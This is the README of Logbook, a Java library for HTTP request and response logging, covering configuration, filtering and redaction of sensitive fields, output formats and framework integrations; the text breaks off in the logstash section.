[![Logbook](docs/logbook.jpg)](#attributions)
[![Stability: Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html)
![Build Status](https://github.com/zalando/logbook/workflows/build/badge.svg)
[![Coverage Status](https://img.shields.io/coveralls/zalando/logbook/main.svg)](https://coveralls.io/r/zalando/logbook)
[![Javadoc](http://javadoc.io/badge/org.zalando/logbook-core.svg)](http://www.javadoc.io/doc/org.zalando/logbook-core)
[![Release](https://img.shields.io/github/release/zalando/logbook.svg)](https://github.com/zalando/logbook/releases)
[![Maven Central](https://img.shields.io/maven-central/v/org.zalando/logbook-parent.svg)](https://maven-badges.herokuapp.com/maven-central/org.zalando/logbook-parent)
[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/zalando/logbook/main/LICENSE)
[![Project Map](https://sourcespy.com/shield.svg)](https://sourcespy.com/github/zalandologbook/)
> **Logbook** noun, /lɑɡ bʊk/: A book in which measurements from the ship's log are recorded, along with other salient details of the voyage.
**Logbook** is an extensible Java library to enable complete request and response logging for different client- and server-side technologies. It satisfies a special need by a) allowing web application
developers to log any HTTP traffic that an application receives or sends b) in a way that makes it easy to persist and analyze it later. This can be useful for traditional log analysis, meeting audit
requirements or investigating individual historic traffic issues.
Logbook is ready to use out of the box for most common setups. Even for uncommon applications and technologies, it should be simple to implement the necessary interfaces to connect a
library/framework/etc. to it.
## Features
- **Logging**: of HTTP requests and responses, including the body; partial logging (no body) for unauthorized requests
- **Customization**: of logging format, logging destination, and conditions that request to log
- **Support**: for Servlet containers, Apache’s HTTP client, Square's OkHttp, and (via its elegant API) other frameworks
- Optional obfuscation of sensitive data
- [Spring Boot](http://projects.spring.io/spring-boot/) Auto Configuration
- [Scalyr](docs/scalyr.md) compatible
- Sensible defaults
## Dependencies
- Java 8 (for Spring 6 / Spring Boot 3 and JAX-RS 3.x, Java 17 is required)
- Any build tool using Maven Central, or direct download
- Servlet Container (optional)
- Apache HTTP Client 4.x **or 5.x** (optional)
- JAX-RS 3.x (aka Jakarta RESTful Web Services) Client and Server (optional)
- JAX-RS 2.x Client and Server (optional)
- Netty 4.x (optional)
- OkHttp 2.x **or 3.x** (optional)
- Spring **6.x** or Spring 5.x (optional, see instructions below)
- Spring Boot **3.x** or 2.x (optional)
- Ktor (optional)
- logstash-logback-encoder 5.x (optional)
## Installation
Add the following dependency to your project:
```xml
org.zalandologbook-core${logbook.version}
```
### Spring 5 / Spring Boot 2 Support
For Spring 5 / Spring Boot 2 backwards compatibility please add the following import:
```xml
org.zalandologbook-servlet${logbook.version}javax
```
Additional modules/artifacts of Logbook always share the same version number.
Alternatively, you can import our *bill of materials*...
```xml
org.zalandologbook-bom${logbook.version}pomimport
```
... which allows you to omit versions:
```xml
org.zalandologbook-coreorg.zalandologbook-httpclientorg.zalandologbook-jaxrsorg.zalandologbook-jsonorg.zalandologbook-nettyorg.zalandologbook-okhttporg.zalandologbook-okhttp2org.zalandologbook-servletorg.zalandologbook-spring-boot-starterorg.zalandologbook-ktor-commonorg.zalandologbook-ktor-clientorg.zalandologbook-ktor-serverorg.zalandologbook-ktororg.zalandologbook-logstash
```
The logbook logger must be configured to trace level in order to log the requests and responses. With Spring Boot 2 (using Logback) this can be accomplished by adding the following line to your `application.properties`
```
logging.level.org.zalando.logbook: TRACE
```
## Usage
All integrations require an instance of `Logbook` which holds all configuration and wires all necessary parts together.
You can either create one using all the defaults:
```java
Logbook logbook = Logbook.create();
```
or create a customized version using the `LogbookBuilder`:
```java
Logbook logbook = Logbook.builder()
.condition(new CustomCondition())
.queryFilter(new CustomQueryFilter())
.pathFilter(new CustomPathFilter())
.headerFilter(new CustomHeaderFilter())
.bodyFilter(new CustomBodyFilter())
.requestFilter(new CustomRequestFilter())
.responseFilter(new CustomResponseFilter())
.sink(new DefaultSink(
new CustomHttpLogFormatter(),
new CustomHttpLogWriter()
))
.build();
```
### Strategy
Logbook used to have a very rigid strategy how to do request/response logging:
- Requests/responses are logged separately
- Requests/responses are logged soon as possible
- Requests/responses are logged as a pair or not logged at all
(i.e. no partial logging of traffic)
Some of those restrictions could be mitigated with custom [`HttpLogWriter`](#writing)
implementations, but they were never ideal.
Starting with version 2.0 Logbook now comes with a [Strategy pattern](https://en.wikipedia.org/wiki/Strategy_pattern)
at its core. Make sure you read the documentation of the [`Strategy`](logbook-api/src/main/java/org/zalando/logbook/Strategy.java)
interface to understand the implications.
Logbook comes with some built-in strategies:
- [`BodyOnlyIfStatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/BodyOnlyIfStatusAtLeastStrategy.java)
- [`StatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/StatusAtLeastStrategy.java)
- [`WithoutBodyStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/WithoutBodyStrategy.java)
### Attribute Extractor
Starting with version 3.4.0, Logbook is equipped with a feature called *Attribute Extractor*. Attributes are basically a
list of key/value pairs that can be extracted from request and/or response, and logged with them. The idea was sprouted
from [issue 381](https://github.com/zalando/logbook/issues/381), where a feature was requested to extract the subject
claim from JWT tokens in the authorization header.
The `AttributeExtractor` interface has two `extract` methods: One that can extract attributes from the request only, and
one that has both request and response at its avail. The both return an instance of the `HttpAttributes` class, which is
basically a fancy `Map`. Notice that since the map values are of type `Object`, they should have a
proper `toString()` method in order for them to appear in the logs in a meaningful way. Alternatively, log formatters
can work around this by implementing their own serialization logic. For instance, the built-in log formatter
`JsonHttpLogFormatter` uses `ObjectMapper` to serialize the values.
Here is an example:
```java
final class OriginExtractor implements AttributeExtractor {
@Override
public HttpAttributes extract(final HttpRequest request) {
return HttpAttributes.of(""origin"", request.getOrigin());
}
}
```
Logbook must then be created by registering this attribute extractor:
```java
final Logbook logbook = Logbook.builder()
.attributeExtractor(new OriginExtractor())
.build();
```
This will result in request logs to include something like:
```text
""attributes"":{""origin"":""LOCAL""}
```
For more advanced examples, look at the `JwtFirstMatchingClaimExtractor` and `JwtAllMatchingClaimsExtractor` classes.
The former extracts the first claim matching a list of claim names from the request JWT token.
The latter extracts all claims matching a list of claim names from the request JWT token.
If you require to incorporate multiple `AttributeExtractor`s, you can use the class `CompositeAttributeExtractor`:
```java
final List extractors = List.of(
extractor1,
extractor2,
extractor3
);
final Logbook logbook = Logbook.builder()
.attributeExtractor(new CompositeAttributeExtractor(extractors))
.build();
```
### Phases
Logbook works in several different phases:
1. [Conditional](#conditional),
2. [Filtering](#filtering),
3. [Formatting](#formatting) and
4. [Writing](#writing)
Each phase is represented by one or more interfaces that can be used for customization. Every phase has a sensible default.
#### Conditional
Logging HTTP messages and including their bodies is a rather expensive task, so it makes a lot of sense to disable logging for certain requests. A common use case would be to ignore *health check*
requests from a load balancer, or any request to management endpoints typically issued by developers.
Defining a condition is as easy as writing a special `Predicate` that decides whether a request (and its corresponding response) should be logged or not. Alternatively you can use and combine
predefined predicates:
```java
Logbook logbook = Logbook.builder()
.condition(exclude(
requestTo(""/health""),
requestTo(""/admin/**""),
contentType(""application/octet-stream""),
header(""X-Secret"", newHashSet(""1"", ""true"")::contains)))
.build();
```
Exclusion patterns, e.g. `/admin/**`, are loosely following [Ant's style of path patterns](https://ant.apache.org/manual/dirtasks.html#patterns)
without taking the the query string of the URL into consideration.
#### Filtering
The goal of *Filtering* is to prevent the logging of certain sensitive parts of HTTP requests and responses. This
usually includes the *Authorization* header, but could also apply to certain plaintext query or form parameters —
e.g. *password*.
Logbook supports different types of filters:
| Type | Operates on | Applies to | Default |
|------------------|--------------------------------|------------|-----------------------------------------------------------------------------------|
| `QueryFilter` | Query string | request | `access_token` |
| `PathFilter` | Path | request | n/a |
| `HeaderFilter` | Header (single key-value pair) | both | `Authorization` |
| `BodyFilter` | Content-Type and body | both | json: `access_token` and `refresh_token` form: `client_secret` and `password` |
| `RequestFilter` | `HttpRequest` | request | Replace binary, multipart and stream bodies. |
| `ResponseFilter` | `HttpResponse` | response | Replace binary, multipart and stream bodies. |
`QueryFilter`, `PathFilter`, `HeaderFilter` and `BodyFilter` are relatively high-level and should cover all needs in ~90% of all
cases. For more complicated setups one should fallback to the low-level variants, i.e. `RequestFilter` and `ResponseFilter`
respectively (in conjunction with `ForwardingHttpRequest`/`ForwardingHttpResponse`).
You can configure filters like this:
```java
import static org.zalando.logbook.core.HeaderFilters.authorization;
import static org.zalando.logbook.core.HeaderFilters.eachHeader;
import static org.zalando.logbook.core.QueryFilters.accessToken;
import static org.zalando.logbook.core.QueryFilters.replaceQuery;
Logbook logbook = Logbook.builder()
.requestFilter(RequestFilters.replaceBody(message -> contentType(""audio/*"").test(message) ? ""mmh mmh mmh mmh"" : null))
.responseFilter(ResponseFilters.replaceBody(message -> contentType(""*/*-stream"").test(message) ? ""It just keeps going and going..."" : null))
.queryFilter(accessToken())
.queryFilter(replaceQuery(""password"", """"))
.headerFilter(authorization())
.headerFilter(eachHeader(""X-Secret""::equalsIgnoreCase, """"))
.build();
```
You can configure as many filters as you want - they will run consecutively.
##### JsonPath body filtering (experimental)
You can apply [JSON Path](https://github.com/json-path/JsonPath) filtering to JSON bodies.
Here are some examples:
```java
import static org.zalando.logbook.json.JsonPathBodyFilters.jsonPath;
import static java.util.regex.Pattern.compile;
Logbook logbook = Logbook.builder()
.bodyFilter(jsonPath(""$.password"").delete())
.bodyFilter(jsonPath(""$.active"").replace(""unknown""))
.bodyFilter(jsonPath(""$.address"").replace(""X""))
.bodyFilter(jsonPath(""$.name"").replace(compile(""^(\\w).+""), ""$1.""))
.bodyFilter(jsonPath(""$.friends.*.name"").replace(compile(""^(\\w).+""), ""$1.""))
.bodyFilter(jsonPath(""$.grades.*"").replace(1.0))
.build();
```
Take a look at the following example, before and after filtering was applied:
Before
```json
{
""id"": 1,
""name"": ""Alice"",
""password"": ""s3cr3t"",
""active"": true,
""address"": ""Anhalter Straße 17 13, 67278 Bockenheim an der Weinstraße"",
""friends"": [
{
""id"": 2,
""name"": ""Bob""
},
{
""id"": 3,
""name"": ""Charlie""
}
],
""grades"": {
""Math"": 1.0,
""English"": 2.2,
""Science"": 1.9,
""PE"": 4.0
}
}
```
After
```json
{
""id"": 1,
""name"": ""Alice"",
""active"": ""unknown"",
""address"": ""XXX"",
""friends"": [
{
""id"": 2,
""name"": ""B.""
},
{
""id"": 3,
""name"": ""C.""
}
],
""grades"": {
""Math"": 1.0,
""English"": 1.0,
""Science"": 1.0,
""PE"": 1.0
}
}
```
#### Correlation
Logbook uses a *correlation id* to correlate requests and responses. This allows match-related requests and responses that would usually be located in different places in the log file.
If the default implementation of the correlation id is insufficient for your use case, you may provide a custom implementation:
```java
Logbook logbook = Logbook.builder()
.correlationId(new CustomCorrelationId())
.build();
```
#### Formatting
*Formatting* defines how requests and responses will be transformed to strings basically. Formatters do **not** specify where requests and responses are logged to — writers do that work.
Logbook comes with two different default formatters: *HTTP* and *JSON*.
##### HTTP
*HTTP* is the default formatting style, provided by the `DefaultHttpLogFormatter`. It is primarily designed to be used for local development and debugging, not for production use. This is because it’s
not as readily machine-readable as JSON.
###### Request
```http
Incoming Request: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
GET http://example.org/test HTTP/1.1
Accept: application/json
Host: localhost
Content-Type: text/plain
Hello world!
```
###### Response
```http
Outgoing Response: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
Duration: 25 ms
HTTP/1.1 200
Content-Type: application/json
{""value"":""Hello world!""}
```
##### JSON
*JSON* is an alternative formatting style, provided by the `JsonHttpLogFormatter`. Unlike HTTP, it is primarily designed for production use — parsers and log consumers can easily consume it.
Requires the following dependency:
```xml
org.zalandologbook-json
```
###### Request
```json
{
""origin"": ""remote"",
""type"": ""request"",
""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
""protocol"": ""HTTP/1.1"",
""sender"": ""127.0.0.1"",
""method"": ""GET"",
""uri"": ""http://example.org/test"",
""host"": ""example.org"",
""path"": ""/test"",
""scheme"": ""http"",
""port"": null,
""headers"": {
""Accept"": [""application/json""],
""Content-Type"": [""text/plain""]
},
""body"": ""Hello world!""
}
```
###### Response
```json
{
""origin"": ""local"",
""type"": ""response"",
""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
""duration"": 25,
""protocol"": ""HTTP/1.1"",
""status"": 200,
""headers"": {
""Content-Type"": [""text/plain""]
},
""body"": ""Hello world!""
}
```
Note: Bodies of type `application/json` (and `application/*+json`) will be *inlined* into the resulting JSON tree. I.e.,
a JSON response body will **not** be escaped and represented as a string:
```json
{
""origin"": ""local"",
""type"": ""response"",
""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
""duration"": 25,
""protocol"": ""HTTP/1.1"",
""status"": 200,
""headers"": {
""Content-Type"": [""application/json""]
},
""body"": {
""greeting"": ""Hello, world!""
}
}
```
##### Common Log Format
The Common Log Format ([CLF](https://httpd.apache.org/docs/trunk/logs.html#common)) is a standardized text file format used by web servers when generating server log files. The format is supported via
the `CommonsLogFormatSink`:
```text
185.85.220.253 - - [02/Aug/2019:08:16:41 0000] ""GET /search?q=zalando HTTP/1.1"" 200 -
```
##### Extended Log Format
The Extended Log Format ([ELF](https://en.wikipedia.org/wiki/Extended_Log_Format)) is a standardised text file format, like Common Log Format (CLF), that is used by web servers when generating log
files, but ELF files provide more information and flexibility. The format is supported via the `ExtendedLogFormatSink`.
Also see [W3C](https://www.w3.org/TR/WD-logfile.html) document.
Default fields:
```text
date time c-ip s-dns cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs-protocol cs(User-Agent) cs(Cookie) cs(Referrer)
```
Default log output example:
```text
2019-08-02 08:16:41 185.85.220.253 localhost POST /search ?q=zalando 200 21 20 0.125 HTTP/1.1 ""Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"" ""name=value"" ""https://example.com/page?q=123""
```
Users may override default fields with their custom fields through the constructor of `ExtendedLogFormatSink`:
```java
new ExtendedLogFormatSink(new DefaultHttpLogWriter(),""date time cs(Custom-Request-Header) sc(Custom-Response-Header)"")
```
For Http header fields: `cs(Any-Header)` and `sc(Any-Header)`, users could specify any headers they want to extract from the request.
Other supported fields are listed in the value of `ExtendedLogFormatSink.Field`, which can be put in the custom field expression.
##### cURL
*cURL* is an alternative formatting style, provided by the `CurlHttpLogFormatter` which will render requests as
executable [`cURL`](https://curl.haxx.se/) commands. Unlike JSON, it is primarily designed for humans.
###### Request
```bash
curl -v -X GET 'http://localhost/test' -H 'Accept: application/json'
```
###### Response
See [HTTP](#http) or provide own fallback for responses:
```java
new CurlHttpLogFormatter(new JsonHttpLogFormatter());
```
##### Splunk
*Splunk* is an alternative formatting style, provided by the `SplunkHttpLogFormatter` which will render
requests and response as key-value pairs.
###### Request
```text
origin=remote type=request correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b protocol=HTTP/1.1 sender=127.0.0.1 method=POST uri=http://example.org/test host=example.org scheme=http port=null path=/test headers={Accept=[application/json], Content-Type=[text/plain]} body=Hello world!
```
###### Response
```text
origin=local type=response correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b duration=25 protocol=HTTP/1.1 status=200 headers={Content-Type=[text/plain]} body=Hello world!
```
#### Writing
Writing defines where formatted requests and responses are written to. Logbook comes with three implementations:
Logger, Stream and Chunking.
##### Logger
By default, requests and responses are logged with an *slf4j* logger that uses the `org.zalando.logbook.Logbook`
category and the log level `trace`. This can be customized:
```java
Logbook logbook = Logbook.builder()
.sink(new DefaultSink(
new DefaultHttpLogFormatter(),
new DefaultHttpLogWriter()
))
.build();
```
##### Stream
An alternative implementation is to log requests and responses to a `PrintStream`, e.g. `System.out` or `System.err`. This is usually a bad choice for running in production, but can sometimes be
useful for short-term local development and/or investigation.
```java
Logbook logbook = Logbook.builder()
.sink(new DefaultSink(
new DefaultHttpLogFormatter(),
new StreamHttpLogWriter(System.err)
))
.build();
```
##### Chunking
The `ChunkingSink` will split long messages into smaller chunks and will write them individually while delegating to another sink:
```java
Logbook logbook = Logbook.builder()
.sink(new ChunkingSink(sink, 1000))
.build();
```
#### Sink
The combination of `HttpLogFormatter` and `HttpLogWriter` suits most use cases well, but it has limitations.
Implementing the `Sink` interface directly allows for more sophisticated use cases, e.g. writing requests/responses
to a structured persistent storage like a database.
Multiple sinks can be combined into one using the `CompositeSink`.
### Servlet
You’ll have to register the `LogbookFilter` as a `Filter` in your filter chain — either in your `web.xml` file (please note that the xml approach will use all the defaults and is not configurable):
```xml
LogbookFilterorg.zalando.logbook.servlet.LogbookFilterLogbookFilter/*REQUESTASYNC
```
or programmatically, via the `ServletContext`:
```java
context.addFilter(""LogbookFilter"", new LogbookFilter(logbook))
.addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*"");
```
**Beware**: The `ERROR` dispatch is not supported. You're strongly advised to produce error responses within the
`REQUEST` or `ASNYC` dispatch.
The `LogbookFilter` will, by default, treat requests with a `application/x-www-form-urlencoded` body not different from
any other request, i.e you will see the request body in the logs. The downside of this approach is that you won't be
able to use any of the `HttpServletRequest.getParameter*(..)` methods. See issue [#94](../../issues/94) for some more
details.
#### Form Requests
As of Logbook 1.5.0, you can now specify one of three strategies that define how Logbook deals with this situation by
using the `logbook.servlet.form-request` system property:
| Value | Pros | Cons |
|------------------|-----------------------------------------------------------------------------------|----------------------------------------------------|
| `body` (default) | Body is logged | Downstream code can **not use `getParameter*()`** |
| `parameter` | Body is logged (but it's reconstructed from parameters) | Downstream code can **not use `getInputStream()`** |
| `off` | Downstream code can decide whether to use `getInputStream()` or `getParameter*()` | Body is **not logged** |
#### Security
Secure applications usually need a slightly different setup. You should generally avoid logging unauthorized requests, especially the body, because it quickly allows attackers to flood your logfile —
and, consequently, your precious disk space. Assuming that your application handles authorization inside another filter, you have two choices:
- Don't log unauthorized requests
- Log unauthorized requests without the request body
You can easily achieve the former setup by placing the `LogbookFilter` after your security filter. The latter is a little bit more sophisticated. You’ll need two `LogbookFilter` instances — one before
your security filter, and one after it:
```java
context.addFilter(""SecureLogbookFilter"", new SecureLogbookFilter(logbook))
.addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*"");
context.addFilter(""securityFilter"", new SecurityFilter())
.addMappingForUrlPatterns(EnumSet.of(REQUEST), true, ""/*"");
context.addFilter(""LogbookFilter"", new LogbookFilter(logbook))
.addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*"");
```
The first logbook filter will log unauthorized requests **only**. The second filter will log authorized requests, as always.
### HTTP Client
The `logbook-httpclient` module contains both an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`:
```java
CloseableHttpClient client = HttpClientBuilder.create()
.addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.addInterceptorFirst(new LogbookHttpResponseInterceptor())
.build();
```
Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses:
```java
CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
.addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.build();
// and then wrap your response consumer
client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
```
### HTTP Client 5
The `logbook-httpclient5` module contains an `ExecHandler` to use with the `HttpClient`:
```java
CloseableHttpClient client = HttpClientBuilder.create()
.addExecInterceptorFirst(""Logbook"", new LogbookHttpExecHandler(logbook))
.build();
```
The Handler should be added first, such that a compression is performed after logging and decompression is performed before logging.
To avoid a breaking change, there is also an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`, which works fine as long as compression (or other ExecHandlers) is
not used:
```java
CloseableHttpClient client = HttpClientBuilder.create()
.addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.addResponseInterceptorFirst(new LogbookHttpResponseInterceptor())
.build();
```
Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses:
```java
CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
.addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.build();
// and then wrap your response consumer
client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
```
### JAX-RS 2.x and 3.x (aka Jakarta RESTful Web Services)
> [!NOTE]
> **Support for JAX-RS 2.x**
>
> JAX-RS 2.x (legacy) support was dropped in Logbook 3.0 to 3.6.
>
> As of Logbook 3.7, JAX-RS 2.x support is back.
>
> However, you need to add the `javax` **classifier** to use the proper Logbook module:
>
> ```xml
>
> org.zalando
> logbook-jaxrs
> ${logbook.version}
> javax
>
> ```
>
> You should also make sure that the following dependencies are on your classpath.
> By default, `logbook-jaxrs` imports `jersey-client 3.x`, which is not compatible with JAX-RS 2.x:
>
> * [jersey-client 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.core/jersey-client/2.41)
> * [jersey-hk2 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.inject/jersey-hk2/2.41)
> * [javax.activation](https://mvnrepository.com/artifact/javax.activation/activation/1.1.1)
The `logbook-jaxrs` module contains:
A `LogbookClientFilter` to be used for applications making HTTP requests
```java
client.register(new LogbookClientFilter(logbook));
```
A `LogbookServerFilter` for be used with HTTP servers
```java
resourceConfig.register(new LogbookServerFilter(logbook));
```
### JDK HTTP Server
The `logbook-jdkserver` module provides support for
[JDK HTTP server](https://docs.oracle.com/javase/8/docs/jre/api/net/httpserver/spec/com/sun/net/httpserver/HttpServer.html)
and contains:
A `LogbookFilter` to be used with the builtin server
```java
httpServer.createContext(path,handler).getFilters().add(new LogbookFilter(logbook))
```
### Netty
The `logbook-netty` module contains:
A `LogbookClientHandler` to be used with an `HttpClient`:
```java
HttpClient httpClient =
HttpClient.create()
.doOnConnected(
(connection -> connection.addHandlerLast(new LogbookClientHandler(logbook)))
);
```
A `LogbookServerHandler` for use used with an `HttpServer`:
```java
HttpServer httpServer =
HttpServer.create()
.doOnConnection(
connection -> connection.addHandlerLast(new LogbookServerHandler(logbook))
);
```
#### Spring WebFlux
Users of Spring WebFlux can pick any of the following options:
- Programmatically create a `NettyWebServer` (passing an `HttpServer`)
- Register a custom `NettyServerCustomizer`
- Programmatically create a `ReactorClientHttpConnector` (passing an `HttpClient`)
- Register a custom `WebClientCustomizer`
- Use separate connector-independent module `logbook-spring-webflux`
#### Micronaut
Users of Micronaut can follow the [official docs](https://docs.micronaut.io/snapshot/guide/index.html#nettyClientPipeline) on how to integrate Logbook with Micronaut.
:warning: Even though Quarkus and Vert.x use Netty under the hood, unfortunately neither of them allows accessing or customizing it (yet).
### OkHttp v2.x
The `logbook-okhttp2` module contains an `Interceptor` to use with version 2.x of the `OkHttpClient`:
```java
OkHttpClient client = new OkHttpClient();
client.networkInterceptors().add(new LogbookInterceptor(logbook));
```
If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition.
The transparent gzip support built into OkHttp will run after any network interceptor which forces
logbook to log compressed binary responses.
```java
OkHttpClient client = new OkHttpClient();
client.networkInterceptors().add(new LogbookInterceptor(logbook));
client.networkInterceptors().add(new GzipInterceptor());
```
### OkHttp v3.x
The `logbook-okhttp` module contains an `Interceptor` to use with version 3.x of the `OkHttpClient`:
```java
OkHttpClient client = new OkHttpClient.Builder()
.addNetworkInterceptor(new LogbookInterceptor(logbook))
.build();
```
If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition.
The transparent gzip support built into OkHttp will run after any network interceptor which forces
logbook to log compressed binary responses.
```java
OkHttpClient client = new OkHttpClient.Builder()
.addNetworkInterceptor(new LogbookInterceptor(logbook))
.addNetworkInterceptor(new GzipInterceptor())
.build();
```
### Ktor
The `logbook-ktor-client` module contains:
A `LogbookClient` to be used with an `HttpClient`:
```kotlin
private val client = HttpClient(CIO) {
install(LogbookClient) {
logbook = logbook
}
}
```
The `logbook-ktor-server` module contains:
A `LogbookServer` to be used with an `Application`:
```kotlin
private val server = embeddedServer(CIO) {
install(LogbookServer) {
logbook = logbook
}
}
```
Alternatively, you can use `logbook-ktor`, which ships both `logbook-ktor-client` and `logbook-ktor-server` modules.
### Spring
The `logbook-spring` module contains a `ClientHttpRequestInterceptor` to use with `RestTemplate`:
```java
LogbookClientHttpRequestInterceptor interceptor = new LogbookClientHttpRequestInterceptor(logbook);
RestTemplate restTemplate = new RestTemplate();
restTemplate.getInterceptors().add(interceptor);
```
### Spring Boot Starter
Logbook comes with a convenient auto configuration for Spring Boot users. It sets up all of the following parts automatically with sensible defaults:
- Servlet filter
- Second Servlet filter for unauthorized requests (if Spring Security is detected)
- Header-/Parameter-/Body-Filters
- HTTP-/JSON-style formatter
- Logging writer
Instead of declaring a dependency to `logbook-core` declare one to the Spring Boot Starter:
```xml
org.zalandologbook-spring-boot-starter${logbook.version}
```
Every bean can be overridden and customized if needed, e.g. like this:
```java
@Bean
public BodyFilter bodyFilter() {
return merge(
defaultValue(),
replaceJsonStringProperty(singleton(""secret""), ""XXX""));
}
```
Please refer to [`LogbookAutoConfiguration`](logbook-spring-boot-autoconfigure/src/main/java/org/zalando/logbook/autoconfigure/LogbookAutoConfiguration.java)
or the following table to see a list of possible integration points:
| Type | Name | Default |
|--------------------------|-----------------------|---------------------------------------------------------------------------|
| `FilterRegistrationBean` | `secureLogbookFilter` | Based on `LogbookFilter` |
| `FilterRegistrationBean` | `logbookFilter` | Based on `LogbookFilter` |
| `Logbook` | | Based on condition, filters, formatter and writer |
| `Predicate` | `requestCondition` | No filter; is later combined with `logbook.exclude` and `logbook.exclude` |
| `HeaderFilter` | | Based on `logbook.obfuscate.headers` |
| `PathFilter` | | Based on `logbook.obfuscate.paths` |
| `QueryFilter` | | Based on `logbook.obfuscate.parameters` |
| `BodyFilter` | | `BodyFilters.defaultValue()`, see [filtering](#filtering) |
| `RequestFilter` | | `RequestFilters.defaultValue()`, see [filtering](#filtering) |
| `ResponseFilter` | | `ResponseFilters.defaultValue()`, see [filtering](#filtering) |
| `Strategy` | | `DefaultStrategy` |
| `AttributeExtractor` | | `NoOpAttributeExtractor` |
| `Sink` | | `DefaultSink` |
| `HttpLogFormatter` | | `JsonHttpLogFormatter` |
| `HttpLogWriter` | | `DefaultHttpLogWriter` |
Multiple filters are merged into one.
#### Autoconfigured beans from `logbook-spring`
Some classes from `logbook-spring` are included in the auto configuration.
You can autowire `LogbookClientHttpRequestInterceptor` with code like:
```java
private final RestTemplate restTemplate;
MyClient(RestTemplateBuilder builder, LogbookClientHttpRequestInterceptor interceptor){
this.restTemplate = builder
.additionalInterceptors(interceptor)
.build();
}
```
#### Configuration
The following tables show the available configuration (sorted alphabetically):
| Configuration | Description | Default |
|------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------|
| `logbook.attribute-extractors` | List of [AttributeExtractor](#attribute-extractor)s, including configurations such as `type` (currently `JwtFirstMatchingClaimExtractor` or `JwtAllMatchingClaimsExtractor`), `claim-names` and `claim-key`. | `[]` |
| `logbook.filter.enabled` | Enable the [`LogbookFilter`](#servlet) | `true` |
| `logbook.filter.form-request-mode` | Determines how [form requests](#form-requests) are handled | `body` |
| `logbook.filters.body.default-enabled` | Enables/disables default body filters that are collected by java.util.ServiceLoader | `true` |
| `logbook.format.style` | [Formatting style](#formatting) (`http`, `json`, `curl` or `splunk`) | `json` |
| `logbook.httpclient.decompress-response` | Enables/disables additional decompression process for HttpClient with gzip encoded body (to logging purposes only). This means extra decompression and possible performance impact. | `false` (disabled) |
| `logbook.minimum-status` | Minimum status to enable logging (`status-at-least` and `body-only-if-status-at-least`) | `400` |
| `logbook.obfuscate.headers` | List of header names that need obfuscation | `[Authorization]` |
| `logbook.obfuscate.json-body-fields` | List of JSON body fields to be obfuscated | `[]` |
| `logbook.obfuscate.parameters` | List of parameter names that need obfuscation | `[access_token]` |
| `logbook.obfuscate.paths` | List of paths that need obfuscation. Check [Filtering](#filtering) for syntax. | `[]` |
| `logbook.obfuscate.replacement` | A value to be used instead of an obfuscated one | `XXX` |
| `logbook.predicate.include` | Include only certain paths and methods (if defined) | `[]` |
| `logbook.predicate.exclude` | Exclude certain paths and methods (overrides `logbook.preidcates.include`) | `[]` |
| `logbook.secure-filter.enabled` | Enable the [`SecureLogbookFilter`](#servlet) | `true` |
| `logbook.strategy` | [Strategy](#strategy) (`default`, `status-at-least`, `body-only-if-status-at-least`, `without-body`) | `default` |
| `logbook.write.chunk-size` | Splits log lines into smaller chunks of size up-to `chunk-size`. | `0` (disabled) |
| `logbook.write.max-body-size` | Truncates the body up to `max-body-size` and appends `...`. :warning: Logbook will still buffer the full body, if the request is eligible for logging, regardless of the `logbook.write.max-body-size` value | `-1` (disabled) |
##### Example configuration
```yaml
logbook:
predicate:
include:
- path: /api/**
methods:
- GET
- POST
- path: /actuator/**
exclude:
- path: /actuator/health
- path: /api/admin/**
methods:
- POST
filter.enabled: true
secure-filter.enabled: true
format.style: http
strategy: body-only-if-status-at-least
minimum-status: 400
obfuscate:
headers:
- Authorization
- X-Secret
parameters:
- access_token
- password
write:
chunk-size: 1000
attribute-extractors:
- type: JwtFirstMatchingClaimExtractor
claim-names: [ ""sub"", ""subject"" ]
claim-key: Principal
- type: JwtAllMatchingClaimsExtractor
claim-names: [ ""sub"", ""iat"" ]
```
### logstash-logback-encoder
For basic Logback configuraton
```
```
configure Logbook with a `LogstashLogbackSink`
```
HttpLogFormatter formatter = new JsonHttpLogFormatter();
LogstashLogbackSink sink = new LogstashLogbackSink(formatter);
```
for outputs like
```
{
""@timestamp"" : ""2019-03-08T09:37:46.239+01:00"",
""@version"" : ""1"",
""message"" : ""GET http://localhost/test?limit=1"",
